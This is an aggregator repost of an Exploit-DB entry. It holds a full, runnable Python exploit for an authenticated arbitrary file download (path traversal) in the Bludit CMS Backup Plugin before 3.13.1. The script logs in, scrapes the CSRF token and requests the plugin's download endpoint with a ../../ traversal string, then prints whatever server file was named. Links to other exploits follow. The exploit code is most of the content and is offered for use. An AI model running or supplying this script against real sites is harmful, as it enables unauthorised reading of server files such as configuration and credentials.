[webapps] Bludit < 3.13.1 Backup Plugin - Arbitrary File Download (Authentica...
source link: https://www.exploit-db.com/exploits/51541
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Bludit < 3.13.1 Backup Plugin - Arbitrary File Download (Authenticated)
# -*- coding: utf-8 -*-
#/usr/bin/env python
# Exploit Title: Bludit < 3.13.1 Backup Plugin - Arbitrary File Download (Authenticated)
# Date: 2022-07-21
# Exploit Author: Antonio Cuomo (arkantolo)
# Vendor Homepage: https://www.bludit.com
# Software Link: https://github.com/bludit/bludit
# Version: < 3.13.1
# Tested on: Debian 10 - PHP Version: 7.3.14
import requests
import argparse
from bs4 import BeautifulSoup #pip3 install beautifulsoup4
def main():
parser = argparse.ArgumentParser(description='Bludit < 3.13.1 - Backup Plugin - Arbitrary File Download (Authenticated)')
parser.add_argument('-x', '--url', type=str, required=True)
parser.add_argument('-u', '--user', type=str, required=True)
parser.add_argument('-p', '--password', type=str, required=True)
parser.add_argument('-f', '--file', type=str, required=True)
args = parser.parse_args()
print("\nBludit < 3.13.1 - Backup Plugin - Arbitrary File Download (Authenticated)","\nExploit Author: Antonio Cuomo (Arkantolo)\n")
exploit(args)
def exploit(args):
s2 = requests.Session()
url = args.url.rstrip("/")
#get csrf token
r = s2.get(url+'/admin/')
soup = BeautifulSoup(r.text, 'html.parser')
formtoken = soup.find('input', {'name':'tokenCSRF'})['value']
#login
body= {'tokenCSRF':formtoken,'username':args.user,'password':args.password}
r = s2.post(url+'/admin/', data=body, allow_redirects=False)
if(r.status_code==301 and r.headers['location'].find('/admin/dashboard') != -1):
print("[*] Login OK")
else:
print("[*] Login Failed")
exit(1)
#arbitrary download
r = s2.get(url+'/plugin-backup-download?file=../../../../../../../../'+args.file)
if(r.status_code==200 and len(r.content)>0):
print("[*] File:")
print(r.text)
else:
print("[*] Exploit Failed")
exit(1)
if __name__ == '__main__':
main()
Recommend
-
10
Not FoundYou just hit a route that doesn't exist... the sadness.LoginRadius empowers businesses to deliver a delightful customer experience and win customer trust. Using the LoginRadius Identity...
-
5
WordPress Plugin Duplicator 1.4.6 - Unauthenticated Backup Download...
-
9
iBooking v1.0.8 - Arbitrary File Upload ...
-
26
Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution (RCE) (Authenticated)...
-
12
WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE...
-
12
Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated)...
-
3
Bludit 4.0.0-rc-2 - Account takeover ...
-
8
WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup...
-
9
Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated)...
-
10
Exchange JWT token from Azure with token issued by SAP Cloud Identity Authentication Service As a developer you may have the need to authenticate to applications hosted in SAP Business Technology Platform (SAP BTP) from 3r...
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK